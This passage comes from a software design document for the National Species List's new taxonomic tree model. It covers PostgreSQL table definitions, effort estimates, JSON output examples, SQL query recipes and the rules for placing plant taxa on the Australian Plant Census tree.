been optimised\nfor this machine yet.\n****\n\nCopying 2 million tree_elements into a new table takes around 9.6s\n\n sql> select * into new_tree_elements from tree_element where tree_version_id > 80\n [2017-06-26 17:37:30] completed in 9s 618ms\n\n\nGiven it takes about 12 seconds to copy\/insert 35k tree_elements into the tree_elements table to make a workspace\nit should take around 11 minutes to copy an entire 2 million element tree. We shouldn't have to copy the entire uber\ntree of this size very often.\n\n== What it looks like\n\nimage::new-tree-overview.svg[]\n\n== The model\n\n[source]\n.DDL.sql\n----\nDROP TABLE IF EXISTS tree;\nCREATE TABLE tree (\n id INT8 DEFAULT nextval('nsl_global_seq') NOT NULL,\n lock_version INT8 DEFAULT 0 NOT NULL,\n current_tree_version_id INT8,\n default_draft_tree_version_id INT8,\n group_name TEXT NOT NULL,\n name TEXT NOT NULL,\n reference_id INT8,\n PRIMARY KEY (id)\n);\n\nDROP TABLE IF EXISTS tree_version;\nCREATE TABLE tree_version (\n id INT8 DEFAULT nextval('nsl_global_seq') NOT NULL,\n lock_version INT8 DEFAULT 0 NOT NULL,\n draft_name TEXT NOT NULL,\n log_entry TEXT,\n previous_version_id INT8,\n published BOOLEAN DEFAULT FALSE NOT NULL,\n published_at TIMESTAMP WITH TIME ZONE,\n published_by VARCHAR(100),\n tree_id INT8 NOT NULL,\n PRIMARY KEY (id)\n);\n\nDROP TABLE IF EXISTS tree_element;\nCREATE TABLE tree_element (\n id INT8 DEFAULT nextval('nsl_global_seq') NOT NULL,\n lock_version INT8 DEFAULT 0 NOT NULL,\n depth INT4 NOT NULL,\n display_html TEXT NOT NULL,\n excluded BOOLEAN DEFAULT FALSE NOT NULL,\n instance_id INT8 NOT NULL,\n instance_link TEXT NOT NULL,\n name_element VARCHAR(255) NOT NULL,\n name_id INT8 NOT NULL,\n name_link TEXT NOT NULL,\n name_path TEXT NOT NULL,\n parent_element_id INT8,\n previous_element_id INT8,\n profile JSONB,\n rank VARCHAR(50) NOT NULL,\n rank_path JSONB,\n simple_name TEXT NOT NULL,\n source_element_link TEXT,\n source_shard TEXT NOT NULL,\n synonyms JSONB,\n synonyms_html TEXT NOT NULL,\n tree_path TEXT NOT NULL,\n updated_at TIMESTAMP WITH TIME ZONE NOT NULL,\n updated_by VARCHAR(255) NOT NULL,\n PRIMARY KEY (id)\n);\n\nDROP TABLE IF EXISTS tree_version_element;\nCREATE TABLE tree_version_element (\n element_link TEXT NOT NULL,\n taxon_id INT8 NOT NULL,\n taxon_link TEXT NOT NULL,\n tree_element_id INT8 NOT NULL,\n tree_version_id INT8 NOT NULL,\n PRIMARY KEY (element_link)\n);\n\n----\n\nRefer to code at https:\/\/github.com\/bio-org-au\/nsl-domain-plugin\/blob\/new-tree\/web-app\/sql\/update-to-24.sql\n\n== User impact of change over\n\nCurrently in production:\n\n * a taxon can be added or removed from a tree.\n * the status of the taxon can be changed from accepted to excluded.\n * the comment and distribution values on the tree can be updated, but are not used as instance notes are used instead.\n\nSynonymy does not affect the tree structure as such, as that is related to the concepts that are placed on the tree only.\nThere is no current process to determine if changes to synonymy of taxon concepts (instances) affect the tree, in terms\nof the rules governing placements.\n\nPlacement rules are currently poorly implemented and incomplete.\n\nIn the change over the initial goal will be to replace the existing functionality. We should be able to do this without\nmajor impact or change.\n\n== Amount of work\n\nThere main functional areas affected by this change:\n\n . Search\n . Display\n . Editing\n\nWe would also need to factor out NameTreePath as it is replaced by the new TreeElement and the APNI name tree.\n\nI'm guestimating the amount of work to be around 340 hours in total, which depending on other work could be completed\nin 8 weeks.\n\n=== APNI Name Tree\n\nNow would be the right time to replace the APNI name tree if we're going to do that. JIRA NSL-2304 discusses the issues\naround the name tree being replaced. There is definitely a current need for a tree structure that caters for names that\naren't in the APC\/taxonomic tree.\n\nThe solution suggested in NSL-2304 is to replace Name.sortName with a tree path as per the tree_element and existing\nname_tree_path, and putting the \"agreed\" family of a name in the name where that name is below family. Name id path\nwould be a logical addition to speed up any other name path operations, but we may say\nhttps:\/\/en.wikipedia.org\/wiki\/You_aren%27t_gonna_need_it[YAGNI] on this initially.\n\nTo do this we would do this (in order):\n\n. copy the APC name path to all names in APC\n. copy the APC name path to all synonyms of names on the tree\n. follow name.parent up the tree for names not in APC till we reach a name in APC to build their path.\n\nIn the last step we can stop once we hit a name with a name path, which makes this more of a functional step.\n\nThis still means editors should put the immediate parent of a name in, not the \"Name parent\" as we're still using the\nname tree as a filler for what isn't in APC.\n\n=== Search and display\n\n==== Services\n\nIn the current services we use a search including the tree_nodes to determine if a name is on a tree and where it is\nranked on that tree. We also look to see if a name is in APC to display an APC tick. This has been generalised somewhat\nto allow different \"accepted\" trees.\n\nWe need to refactor:\n\n|===\n|work| notes| effort\n| search and APC\/APNIFormat outputs.| -| 20h\n| tree path code to use the tree_element | will mostly be deleting code that keeps up with tree_node changes| 20h\n| The APNI name tree needs to be replaced | just use the name parent, and make sure Family comes from the accepted\ntree only. Extra time allowed for implementation discussion.|40h\n| tree services API | most of it is deleted.| 40h\n| Tree object representation| -|20h\n| flat view taxon and name exports | rework the view| 10h\n| test infrastructure and tests| -| 30h\n|| -|180h\n|===\n\nObviously the existing tree structure is used extensively in the services for the \"tree services\", but most of that will\njust go and be replaced with a much simpler set of code. The search service and APNI\/APC format out put are the only\nother places that use them along with name_tree_path.\n\n===== Objects representation in HTML\/JSON\n\nCurrently the tree nodes are modeled with and output object which in html looks like\nhttps:\/\/biodiversity.org.au\/nsl\/services\/node\/apni\/9159708\n\nThe JSON version exposes too much of the tree infrastructure by using terminology like \"subnodes\", links and some random\nRDF stuff.\n\nhttps:\/\/biodiversity.org.au\/nsl\/services\/node\/apni\/9159708.json\n\nMost of the following snippet is useless to anyone consuming the data.\n\n[source,javascript]\n.node_snippet.js\n----\n{\n \"class\": \"au.org.biodiversity.nsl.Link\",\n \"typeUri\": {\n \"idPart\": \"btOf\",\n \"nsPart\": \"apc-voc\",\n \"uri\": \"http:\/\/biodiversity.org.au\/voc\/apc\/APC#btOf\",\n \"uriEncoded\": \"http%3A%2F%2Fbiodiversity.org.au%2Fvoc%2Fapc%2FAPC%23btOf\",\n \"qname\": \"apc-voc:btOf\",\n \"css\": \"apc-voc bt-of\"\n },\n \"subNode\": {\n \"class\": \"au.org.biodiversity.nsl.Node\",\n \"_links\": {\n \"permalink\": {\n \"link\": \"https:\/\/id.biodiversity.org.au\/node\/apni\/9159707\",\n \"preferred\": true,\n \"resources\": 1\n }\n },\n \"id\": 9159707,\n \"type\": \"T\",\n \"typeUri\": {\n \"idPart\": \"ApcConcept\",\n \"nsPart\": \"apc-voc\",\n \"uri\": \"http:\/\/biodiversity.org.au\/voc\/apc\/APC#ApcConcept\",\n \"uriEncoded\": \"http%3A%2F%2Fbiodiversity.org.au%2Fvoc%2Fapc%2FAPC%23ApcConcept\",\n \"qname\": \"apc-voc:ApcConcept\",\n \"css\": \"apc-voc apc-concept\"\n }\n },\n \"linkSeq\": 1,\n \"versioningMethod\": {\n \"enumType\": \"au.org.biodiversity.nsl.VersioningMethod\",\n \"name\": \"V\"\n },\n \"isSynthetic\": true\n},\n\n----\n\nWe'll replace the html page with something very similar for now and completely restructure the JSON output to better\nrepresent the taxon in the context of the tree.\n\ne.g.\n\n[source,javascript]\n.treeElement.js\n----\n{\n\n \"treeElement\": {\n \"class\": \"au.org.biodiversity.nsl.TreeElement\",\n \"_links\": {\n \"elementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479620\",\n \"taxonLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/node\/apni\/2908938\",\n \"parentElementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479431\",\n \"nameLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/54576\",\n \"instanceLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instance\/apni\/650575\",\n \"sourceElementLink\": null\n },\n \"tree\": {\n \"class\": \"au.org.biodiversity.nsl.Tree\",\n \"_links\": {\n \"permalinks\": [\n {\n \"link\": \"https:\/\/test-id-vasc.biodiversity.org.au\/tree\/apni\/APC\",\n \"preferred\": true,\n \"resources\": 1\n }\n ]\n },\n \"audit\": null,\n \"name\": \"APC\"\n },\n \"simpleName\": \"Juncaginaceae\",\n \"rankPath\": {\n \"Ordo\": {\n \"id\": 214965.0,\n \"name\": \"Alismatales\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/214965\"\n },\n \"Regnum\": {\n \"id\": 54717.0,\n \"name\": \"Plantae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/54717\"\n },\n \"Classis\": {\n \"id\": 223519.0,\n \"name\": \"Equisetopsida\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/223519\"\n },\n \"Familia\": {\n \"id\": 54576.0,\n \"name\": \"Juncaginaceae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/54576\"\n },\n \"Division\": {\n \"id\": 224706.0,\n \"name\": \"Charophyta\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/224706\"\n },\n \"Superordo\": {\n \"id\": 216053.0,\n \"name\": \"Lilianae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/216053\"\n },\n \"Subclassis\": {\n \"id\": 214954.0,\n \"name\": \"Magnoliidae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/214954\"\n }\n },\n \"namePath\": \"Plantae\/Charophyta\/Equisetopsida\/Magnoliidae\/Lilianae\/Alismatales\/Juncaginaceae\",\n \"displayString\": \"<data><scientific><name id='54576'><element class='Juncaginaceae'>Juncaginaceae<\/element> <authors><author id='7128' title='Richard, L.C.M.'>Rich.<\/author><\/authors><\/name><\/scientific><citation>CHAH (2008), <i>Australian Plant Census<\/i><\/citation><\/data>\",\n \"sourceShard\": \"APNI\",\n \"synonyms\": null,\n \"profile\": {\n \"APC Dist.\": {\n \"value\": \"WA (naturalised), NT, SA, Qld, NSW (native and naturalised), LHI, ACT, Vic (native and naturalised), Tas\",\n \"created_at\": \"2009-09-08T00:00:00+10:00\",\n \"created_by\": \"KIRSTENC\",\n \"updated_at\": \"2009-09-08T00:00:00+10:00\",\n \"updated_by\": \"KIRSTENC\",\n \"source_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instanceNote\/apni\/1110848\"\n }\n },\n \"children\": [\n {\n \"displayHtml\": \"<data><scientific><name id='54576'><element class='Juncaginaceae'>Juncaginaceae<\/element> <authors><author id='7128' title='Richard, L.C.M.'>Rich.<\/author><\/authors><\/name><\/scientific><citation>CHAH (2008), <i>Australian Plant Census<\/i><\/citation><\/data>\",\n \"elementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479620\",\n \"nameLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/54576\",\n \"instanceLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instance\/apni\/650575\",\n \"excluded\": false,\n \"depth\": 7,\n \"synonymsHtml\": \"<synonyms><\/synonyms>\"\n },\n\n ...\n\n {\n \"displayHtml\": \"<data><scientific><name id='215455'><scientific><name id='100623'><element class='Triglochin'>Triglochin<\/element><\/name><\/scientific> <element class='turrifera'>turrifera<\/element> <authors><author id='6955' title='Ewart, A.J.'>Ewart<\/author><\/authors><\/name><\/scientific><citation>CHAH (2006), <i>Australian Plant Census<\/i><\/citation><\/data>\",\n \"elementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479645\",\n \"nameLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/215455\",\n \"instanceLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instance\/apni\/635661\",\n \"excluded\": false,\n \"depth\": 9,\n \"synonymsHtml\": \"<synonyms><tax><scientific><name id='103161'><scientific><name id='100623'><element class='Triglochin'>Triglochin<\/element><\/name><\/scientific> <element class='turrifera'>turrifera<\/element> <authors><author id='6955' title='Ewart, A.J.'>Ewart<\/author><\/authors><\/name><\/scientific> <type>taxonomic synonym<\/type><\/tax><tax><scientific><name id='7377413'><scientific><name id='100623'><element class='Triglochin'>Triglochin<\/element><\/name><\/scientific> <element class='turrifera'>turrifera<\/element> <authors><author id='6833' title='Gardner, C.A.'>C.A.Gardner<\/author><\/authors><\/name><\/scientific> <type>taxonomic synonym<\/type><\/tax><\/synonyms>\"\n }\n ]\n }\n\n}\n----\n\n\n\n==== Editor\n\n|===\n|work| notes| effort\n|convert views| mostly simple changes but need to handle node type| 10h\n|refactor models| the DB models need to be replaced with new models hopefully returning only relevant data| 40h\n|refactor the tree editing tab| with the refactoring of the tree edit service end points this should be a minimal change\nonly replacing some of the reference keys like the voc:AcpComment stuff.| 40h\n|||90h\n|===\n\nThe editor uses views to check if a name is currently accepted:\n\n * accepted_name_vw\n * accepted_synonym_vw\n\nWe would need to change code around type_code which relates directly to tree_node.type_uri_id_part.\n\nThe editor also models\n\n * TreeArrangement\n * TreeLink\n * TreeNode\n * TreeUriNs\n * TreeValueUri\n * AcceptedConcept\n * AcceptedInSomeWay\n\nwhich would all need refactoring for usage.\n\nThere are two different editors for the tree in the instance editor, the current AngularJS based one can be removed\ncompletely and be replaced with the workspace based one that uses the following service end points:\n\n * treeEdit\/updateValue\n * treeEdit\/placeNameOnTree\n * treeEdit\/removeNameFromTree\n\n==== New tree editor\n\n|===\n|work| notes| effort\n|Add admin tasks to admin pages| This should be a straightforward form| 20h\n|Add a tree view| This should already be part of the new tree_element object display replacing the node object| included\n|re work validation code| see services | included\n|||20h\n|===\n\nThis editor needs to be incorporated in the instance editor. The new structure will make this easier, but this is\npossibly not required in the first iteration of this change.\n\nBasically we need to be able to create trees and workspaces and publish or delete a workspace. Create and delete are\npart of the existing API on the services.\n\nWe will make the basic tree administration part of the existing services and incorporate the editing into the instance\neditor. We will develop a tree view for both the editor and services - where the editor view will allow access to\ninstance editing etc.\n\nWe will re-implement the validation code on the new tree structure as a callable service, and as part of the placement\nactions.\n\n==== New search\n\n|===\n|work| notes| effort\n|convert views| mostly simple changes but need to handle node type| 10h\n|refactor models| the DB models need to be replaced with new models hopefully returning only relevant data| 40h\n|||50h\n|===\n\nThe new search app uses the following views:\n\n * accepted_name_vw\n * accepted_synonym_vw\n * instance_resource_vw\n * name_instance_vw\n * name_or_synonym_vw\n\nIt models:\n\n * TreeArrangement\n * TreeNode\n\n== Other stuff\nAt the moment the name tree has namespaces and the lichen name tree has 31 Fungi name spaced names. This doens't work at\nthe moment as a tree can only have one name space. I have changed the lichen names to all have the same namespace (Lichen)\nso that the current name tree works kind of....\n\nBut this is going to bring up a problem we'll have to deal with where we have intersecting trees.\n\n== Query Examples\n\nThis section is for documenting some query examples using the new tree structure.\n\n=== Search for synonyms of a type in a tree\n\n[source,sql]\n.search-synonyms.sql\n----\nSELECT\n el.name_id,\n el.simple_name,\n tax_syn,\n synonyms ->> tax_syn,\n rank.name,\n type.name,\n el.name_path\nFROM tree_element el\n JOIN name n ON el.name_id = n.id\n JOIN name_rank rank ON n.name_rank_id = rank.id\n JOIN name_type type ON n.name_type_id = type.id\n ,\n jsonb_object_keys(synonyms) AS tax_syn\nWHERE tree_version_id = 144\n AND type.scientific\n AND tax_syn ILIKE 'Billardiera b%'\n AND synonyms -> tax_syn ->> 'type' = 'taxonomic synonym'\nORDER BY el.name_path;\n----\n\n|===\n| name_id | simple_name | tax_syn | syn_data | rank | type| name_path\n|55543|Billardiera scandens|Billardiera brachyantha|\"{\"\"type\"\": \"\"taxonomic synonym\"\", \"\"name_id\"\": 230111}\"|Species|scientific| Plantae Charophyta Equisetopsida Magnoliidae Asteranae Apiales Pittosporaceae Billardiera scandens\n|55543|Billardiera scandens|Billardiera brachyantha var. brachyantha|\"{\"\"type\"\": \"\"taxonomic synonym\"\", \"\"name_id\"\": 55168}\"|Species|scientific|Plantae Charophyta Equisetopsida Magnoliidae Asteranae Apiales Pittosporaceae Billardiera scandens\n|84869|Marianthus bicolor|Billardiera bicolor var. lineata|\"{\"\"type\"\": \"\"taxonomic synonym\"\", \"\"name_id\"\": 55149}\"|Species|scientific|Plantae Charophyta Equisetopsida Magnoliidae Asteranae Apiales Pittosporaceae Marianthus bicolor\n\n|===\n\n=== find leaf paths\n\n[source]\n.leaf-paths.sql\n----\n-- find leaf paths\nSELECT e.tree_path as paths\nFROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\nwhere tve.tree_version_id = 9451356\n and not exists(select 1 from tree_version_element ctve join tree_element ce on ctve.tree_element_id = ce.id\nwhere ctve.tree_version_id = 9451356 and ce.parent_element_id = e.id)\nORDER BY e.tree_path\n----\n\n=== circumscribe a taxon at a version\n\nThis function takes a tree version id and a tree_path and gives a sha256 hash of all the leaf node child paths. The\neffectively gives a comparable hash of the circumscription of this taxon which can be used as an identifier that can\ncompare the taxon concept here.\n\n[source]\n.circumscribe.sql\n----\nDROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );\nCREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)\n RETURNS TEXT\nLANGUAGE SQL\nAS\n$$\nSELECT encode(digest(string_agg(paths, ''), 'sha256'), 'hex')\nFROM (\n SELECT e.tree_path AS paths\n FROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\n WHERE tve.tree_version_id = version_id\n AND e.tree_path LIKE path_match || '%'\n ORDER BY e.tree_path\n ) AS circumscription;\n$$;\n\nselect circumscribe(9451356, '\/9451389');\n----\n\nor better still using the simple sha256agg function\n\n[source]\n.circumscribe.sql\n----\nCREATE EXTENSION pgcrypto;\n\nDROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );\nCREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)\n RETURNS TEXT\nLANGUAGE SQL\nAS\n$$\nSELECT sha256_agg(paths)\nFROM (\n SELECT e.tree_path AS paths\n FROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\n WHERE tve.tree_version_id = version_id\n AND e.tree_path LIKE path_match || '%'\n ORDER BY e.tree_path\n ) AS circumscription;\n$$;\n----\n\n=== A simple md5_agg aggregate function\n\n[source]\n.md5_agg.sql\n----\nDROP AGGREGATE IF EXISTS md5_agg( TEXT );\nDROP FUNCTION IF EXISTS md5agg_sfunc( TEXT, TEXT );\nDROP FUNCTION IF EXISTS md5agg_finalfunc( TEXT );\n\nCREATE FUNCTION md5agg_sfunc(agg_state TEXT, el TEXT)\n RETURNS TEXT\nIMMUTABLE\nLANGUAGE plpgsql\nAS $$\nDECLARE\n current_sum TEXT;\nBEGIN\n -- RAISE NOTICE 'current state %', agg_state;\n current_sum := md5(coalesce(agg_state, '') || el);\n -- raise notice 'agg state %',current_sum;\n RETURN current_sum;\nEND;\n$$;\n\nCREATE FUNCTION md5agg_finalfunc(agg_state TEXT)\n RETURNS TEXT\nIMMUTABLE\nSTRICT\nLANGUAGE plpgsql\nAS $$\nBEGIN\n RETURN agg_state;\nEND;\n$$;\n\nCREATE AGGREGATE md5_agg ( TEXT )\n(\nSFUNC = md5agg_sfunc,\nSTYPE = TEXT,\nFINALFUNC = md5agg_finalfunc\n);\n----\n\n=== A simple sha256_agg function\n\n[source]\n.sha256_agg.sql\n----\nDROP AGGREGATE IF EXISTS sha256_agg( TEXT );\nDROP FUNCTION IF EXISTS sha256agg_sfunc( TEXT, TEXT );\nDROP FUNCTION IF EXISTS sha256agg_finalfunc( TEXT );\n\nCREATE FUNCTION sha256agg_sfunc(agg_state TEXT, el TEXT)\n RETURNS TEXT\nIMMUTABLE\nLANGUAGE plpgsql\nAS $$\nDECLARE\n current_sum TEXT;\nBEGIN\n -- RAISE NOTICE 'current state %', agg_state;\n current_sum := encode(digest((coalesce(agg_state, '') || el), 'sha256'), 'hex');\n -- raise notice 'agg state %',current_sum;\n RETURN current_sum;\nEND;\n$$;\n\nCREATE FUNCTION sha256agg_finalfunc(agg_state TEXT)\n RETURNS TEXT\nIMMUTABLE\nSTRICT\nLANGUAGE plpgsql\nAS $$\nBEGIN\n RETURN agg_state;\nEND;\n$$;\n\nCREATE AGGREGATE sha256_agg ( TEXT )\n(\nSFUNC = sha256agg_sfunc,\nSTYPE = TEXT,\nFINALFUNC = sha256agg_finalfunc\n);\n----\n\n=== To sum the total data size of the tree_element table\n\n[source]\n.sum_tree_element.sql\n----\nselect\n pg_size_pretty(sum(pg_column_size(tree_version_id))) as tree_version_id_size,\n pg_size_pretty(sum(pg_column_size(tree_element_id))) as tree_element_id_size,\n pg_size_pretty(sum(pg_column_size(lock_version))) as lock_version_size,\n pg_size_pretty(sum(pg_column_size(display_string))) as display_string_size,\n pg_size_pretty(sum(pg_column_size(element_link))) as element_link_size,\n pg_size_pretty(sum(pg_column_size(excluded))) as excluded_size,\n pg_size_pretty(sum(pg_column_size(instance_id))) as instance_id_size,\n pg_size_pretty(sum(pg_column_size(instance_link))) as instance_link_size,\n pg_size_pretty(sum(pg_column_size(name_id))) as name_id_size,\n pg_size_pretty(sum(pg_column_size(name_link))) as name_link_size,\n pg_size_pretty(sum(pg_column_size(name_path))) as name_path_size,\n pg_size_pretty(sum(pg_column_size(names))) as names_size,\n pg_size_pretty(sum(pg_column_size(parent_version_id))) as parent_version_id_size,\n pg_size_pretty(sum(pg_column_size(parent_element_id))) as parent_element_id_size,\n pg_size_pretty(sum(pg_column_size(previous_version_id))) as previous_version_id_size,\n pg_size_pretty(sum(pg_column_size(previous_element_id))) as previous_element_id_size,\n pg_size_pretty(sum(pg_column_size(profile))) as profile_size,\n pg_size_pretty(sum(pg_column_size(rank_path))) as rank_path_size,\n pg_size_pretty(sum(pg_column_size(simple_name))) as simple_name_size,\n pg_size_pretty(sum(pg_column_size(source_element_link))) as source_element_link_size,\n pg_size_pretty(sum(pg_column_size(source_shard))) as source_shard_size,\n pg_size_pretty(sum(pg_column_size(synonyms))) as synonyms_size,\n pg_size_pretty(sum(pg_column_size(tree_path))) as tree_path_size,\n pg_size_pretty(sum(pg_column_size(updated_at))) as updated_at_size,\n pg_size_pretty(sum(pg_column_size(updated_by))) as updated_by_size\n from tree_element;\n----\n\n=== To find the total used sizes of tables in the database\n\n[source]\n.table_size.sql\n----\nSELECT\n *,\n pg_size_pretty(total_bytes) AS total,\n pg_size_pretty(index_bytes) AS INDEX,\n pg_size_pretty(toast_bytes) AS toast,\n pg_size_pretty(table_bytes) AS TABLE\nFROM (\n SELECT\n *,\n total_bytes - index_bytes - COALESCE(toast_bytes, 0) AS table_bytes\n FROM (\n SELECT\n c.oid,\n nspname AS table_schema,\n relname AS TABLE_NAME,\n c.reltuples AS row_estimate,\n pg_total_relation_size(c.oid) AS total_bytes,\n pg_indexes_size(c.oid) AS index_bytes,\n pg_total_relation_size(reltoastrelid) AS toast_bytes\n FROM pg_class c\n LEFT JOIN pg_namespace n ON n.oid = c.relnamespace\n WHERE relkind = 'r' and nspname = 'public'\n ) a\n ) a;\n----\n\n=== fix the depth of all elements in a tree version\n\n[source:sql]\n.update depth.sql\n----\nDO $$\nDECLARE\n c CURSOR FOR\n SELECT tve.parent_id\n FROM tree_version_element tve\n JOIN tree ON tve.tree_version_id = tree.default_draft_tree_version_id AND tree.name = 'APC'\n ORDER BY tve.tree_path\n FOR UPDATE;\nBEGIN\n FOR row IN c LOOP\n UPDATE tree_version_element\n SET depth = coalesce ((select depth + 1 from tree_version_element where element_link = row.parent_id), 1)\n WHERE CURRENT OF c;\n END LOOP;\nEND\n$$\n----\n\nThis works, but sets the depth assuming the top element has the correct depth. The below solution\nis better because it uses the tree_path to set the depth by counting the number of '\/' chars\n\n[source:sql]\n.update depth.sql\n----\nUPDATE tree_version_element\nSET depth = array_length(regexp_split_to_array(tree_path, '\/'),1) - 1\nWHERE tree_version_id = 50617332\nAND tree_path ~ '\/50617337';\n----\n\n== Placement Rules\n\nNOTE: there is a new more succinct document \"placement-rules.adoc\" which is based directly on the new implementation\nafter we've tested and reviewed the results with users. Consider this document to be the before picture and that as the\nafter.\n\nThis is an interpretation of the results of the discussion at https:\/\/www.anbg.gov.au\/ibis25\/display\/NSL\/Tree+Monitor+Functionality\nregarding the placement rules.\n\nThis is from the point of view of attempting to place an instance on a version of a tree. The version of the tree must\nbe consistent within these rules. We take it that an Instance == Concept == Taxon == Taxon concept. The Instance being\nplaced as already been chosen appropriately in an editor.\n\nWARNING: we need to look at the difference between validating a placement, before it's been placed and validating a\nwhole tree that already has been created.\n\n=== The Taxon should not already be on the tree\n=== A Taxon's Name can not be in the tree as an accepted name more than once\n=== The Taxon's Name Rank must be below the parent taxon's rank\n=== A relationship instance can't be put on the tree\n=== Polynomial names must be a child of the name parent except excluded names\n\ne.g. Doodia caudata must be placed under Doodia\n\n=== Hybrid names must be a child of the first hybrid name\n\ne.g. Blechnum cartilagineum Sw. x Doodia media R.Br. must be placed under Blechnum cartilagineum\n\n=== An accepted name can't be placed under an excluded name\n\nAll names above an accepted name must also be accepted.\n\n=== illegal and illegitimate names *should not* be placed on the tree\n\nThis is a warning only because there are illegitimate names used in APC because a phrase name would have to be created.\n\n\n=== A Taxon's Name or Synonyms can only be in the tree once.\n\nchecking for synonyms needs to be done from a point of view. For example with Ficus virens\n(see https:\/\/biodiversity.org.au\/nsl\/services\/search?product=APC&tree.id=1133571&name=Ficus+virens&inc._scientific=&inc.scientific=on&inc._cultivar=&inc._other=&max=100&display=apc&search=true)\n\nFicus virens var. sublanceolata (Miq.) Corner is a synonym of Ficus virens according to CHAH 2005, but not according to\nCHAH 2016 which has them as distinct taxa (so they can both be accepted). The existing code for findSynonymOfInstance\nchecks if a placed instance is cited by the instance you wish to place in any reference (other relationship instance).\nIf you try to place Ficus virens Aiton (CHAH 2016) it will bring up the CHAH 2005 instance, which isn't relevant because\nyou're view (sensu) is CHAH 2016.\n\nSo we should check synonymy from the point of view of the taxa being placed and then the already placed taxa back to the\ntaxa being placed, e.g. from Ficus virens var. sublanceolata\n\nTo warn on taxonomic synonyms we need to check the name of the instance. For example if you try to place Woodwardia Sm.\nunder Blechnaceae using Mueller, F.J.H. von (1882), Systematic Census of Australian Plants which considers Doodia R.Br.\nto be a Synonym, but the instance of Doodia on the tree does not consider woodwardia a taxonmic synonym you won't see\nthe apparently obvious conflict in this placement because the cited instance is not on the tree. So if the instance being\nplaced cites a Name as being a synonym we should probably warn the user.\n\n* relationship instances can't be placed on the accepted tree\n* misapplication synonyms can be ignored.\n* warn if pro. parte synonyms exist elsewhere in the current tree\n\n=== A name once on the tree should always be accounted for on the tree\n\nA name *should* not be removed from a tree, it should be accounted for within the accepted names or synonyms.\n\n==== Implementation within the tree\n\nThe Synonyms field in the Tree Element shows the synonym name and the type. We need to use the synonyms JSON structure to\ndetermine if the name exists as a synonym in the context of what is on the tree currently and that no synonyms of the taxon\nbeing placed are on the tree.\n\nSo if we try and place 'Ficus cunninghami' we might use...\n\n[source]\n.find-synonym-of.sql\n----\nSELECT\n el.name_id,\n el.simple_name,\n tax_syn,\n synonyms ->> tax_syn,\n el.names,\n el.name_path\nFROM tree_element el\n JOIN name n ON el.name_id = n.id,\n jsonb_object_keys(synonyms) AS tax_syn\nWHERE tree_version_id = 146\n AND el.names like '%|Ficus cunninghami|%'\n AND synonyms -> tax_syn ->> 'type' !~ '.*(misapp|pro parte).*'\n and tax_syn = 'Ficus cunninghami'\n----\n\nWhich takes around 60-70ms to find Ficus virens. Note the LIKE on el.names limits the search quickly before using the slower\njsonb queries, and is quicker than the equivalent regex.\n\n[source]\n.explain\n----\nNested Loop (cost=0.98..127531.08 rows=3 width=342)\n -> Nested Loop (cost=0.98..127525.04 rows=3 width=310)\n -> Index Scan using tree_element_pkey on tree_element el (cost=0.56..127511.69 rows=3 width=310)\n Index Cond: (tree_version_id = 146)\n Filter: (names ~~ '%|Ficus cunninghami|%'::text)\n -> Index Only Scan using name_pkey on name n (cost=0.42..4.44 rows=1 width=8)\n Index Cond: (id = el.name_id)\n -> Function Scan on jsonb_object_keys tax_syn (cost=0.00..2.00 rows=1 width=32)\n Filter: ((tax_syn = 'Ficus cunninghami'::text) AND (((el.synonyms -> tax_syn) ->> 'type'::text) !~ '.*(misapp|pro parte).*'::text))\n----\n\nif we repeat that search for all the names in the el.names string for the name we're trying to place, then we would have\nfound all matching names both ways.\n\nSo for example we can find all the clashing synonyms for an instance using:\n\n[source]\n.find_synonyms\n----\nSELECT\n el.name_id,\n el.simple_name,\n tax_syn,\n synonyms -> tax_syn ->> 'type' as syn_type,\n synonyms -> tax_syn ->> 'name_id' as syn_id\nFROM tree_element el\n JOIN name n ON el.name_id = n.id,\n jsonb_object_keys(synonyms) AS tax_syn\nWHERE tree_version_id = 146\n AND synonyms -> tax_syn ->> 'type' !~ '.*(misapp|pro parte).*'\n and tax_syn in (select synonym.simple_name as sn\nfrom Instance s join instance_type it on s.instance_type_id = it.id,\n Name synonym\nwhere s.cited_by_id = :instance_id_to_place\n and synonym.id = s.name_id\n and it.misapplied = FALSE\n and it.pro_parte = FALSE\n);\n----\n\nUsing the above if we try and place Ficus virens var. sublanceolata sensu Jacobs & Packard (1981) plants of NSW instance 692695\nwe get the results:\n\n|===\n|name_id|simple_name|tax_syn|syn_type|syn_id\n\n|75398|Ficus virens|Ficus cunninghamii|taxonomic synonym|90744\n|75398|Ficus virens|Ficus infectoria var. cunninghamii|taxonomic synonym|91343\n|===\n\n==== Checking the validity of an existing tree\n\nCheck all names in the tree for synonyms of that name in the tree:\n(See https:\/\/www.anbg.gov.au\/25jira\/browse\/NSL-2484)\n\n[source]\n.findSynonyms in tree\n----\n-- updated for tree_version_element join table\nSELECT\n 